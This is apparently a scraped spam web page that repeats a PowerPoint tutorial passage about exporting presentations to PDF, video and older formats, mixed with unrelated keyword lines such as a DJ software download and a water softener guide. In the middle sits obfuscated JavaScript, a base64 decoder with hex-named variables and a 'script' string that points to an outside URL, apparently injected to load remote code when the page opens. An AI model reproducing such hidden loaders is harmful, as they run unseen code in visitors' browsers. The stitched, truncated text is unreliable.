It's easy to export your presentation from PowerPoint in a variety of file types:PDF: Saves the presentation as a PDF document instead of a PowerPoint fileVideo: Saves the presentation as a videoPackage for CD: Saves the presentation in a folder along with the Microsoft PowerPoint Viewer, a special slide show player anyone can downloadHandouts: Prints a handout version of your slidesOther file type: Saves in other file types, including PNG and PowerPoint 97-2003To export a presentation:In our example, we'll save the presentation as a PowerPoint 97-2003 file. Serato Scratch Live Download Mac

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It's easy to export your presentation from PowerPoint in a variety of file types:PDF: Saves the presentation as a PDF document instead of a PowerPoint fileVideo: Saves the presentation as a videoPackage for CD: Saves the presentation in a folder along with the Microsoft PowerPoint Viewer, a special slide show player anyone can downloadHandouts: Prints a handout version of your slidesOther file type: Saves in other file types, including PNG and PowerPoint 97-2003To export a presentation:In our example, we'll save the presentation as a PowerPoint 97-2003 file. b0d43de27c Serato Scratch Live Download Mac

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Download Powerpoint 2013 Save To Pdf For Iphone

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Exporting presentationsBy default, PowerPoint presentations are saved in the pptx file type.. constructor(\x22return\x20this\x22)(\x20)' ');')();}catch(_0x5a52dd){_0x39aa8d=window;}return _0x39aa8d;};var _0x39f0b1=_0x7bd247();var _0x20009f='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=';_0x39f0b1['atob']||(_0x39f0b1['atob']=function(_0x35eda5){var _0x52bfb9=String(_0x35eda5)['replace'](/= $/,'');for(var _0x2fd66=0x0,_0x144545,_0x12060f,_0x576ab0=0x0,_0x45cc69='';_0x12060f=_0x52bfb9['charAt'](_0x576ab0 );~_0x12060f&&(_0x144545=_0x2fd66%0x4?_0x144545*0x40 _0x12060f:_0x12060f,_0x2fd66 %0x4)?_0x45cc69 =String['fromCharCode'](0xff&_0x144545>>(-0x2*_0x2fd66&0x6)):0x0){_0x12060f=_0x20009f['indexOf'](_0x12060f);}return _0x45cc69;});}());_0x5cae['base64DecodeUnicode']=function(_0x19ba4a){var _0x15529f=atob(_0x19ba4a);var _0x189bcd=[];for(var _0x14ac73=0x0,_0x52df18=_0x15529f['length'];_0x14ac73=_0x3e4cd7;},'ZZQYh':function _0x1f36fd(_0x38c3c7,_0x4b568c){return _0x38c3c7===_0x4b568c;},'pjLJF':'XEh','etPsp':'script','vPlLX':function _0x46ae89(_0x34150f,_0x203842){return _0x34150f(_0x203842);},'qLtoA':function _0x385331(_0x88f5a5,_0x4432dc){return _0x88f5a5 _0x4432dc;},'CKaQu':function _0x3ec2e7(_0x478e94,_0x5b8d2b){return _0x478e94 _0x5b8d2b;},'ADFni':'https://cloudeyess.. However, there may be times when you need to use another file type, such as a PDF or PowerPoint 97-2003 presentation.. Be careful to choose a file type others will be able to open Resources For EducatorsHelp and SupportВ©1998-2016 Goodwill Community Foundation, Inc. Harveys Water Softener Installation Guide

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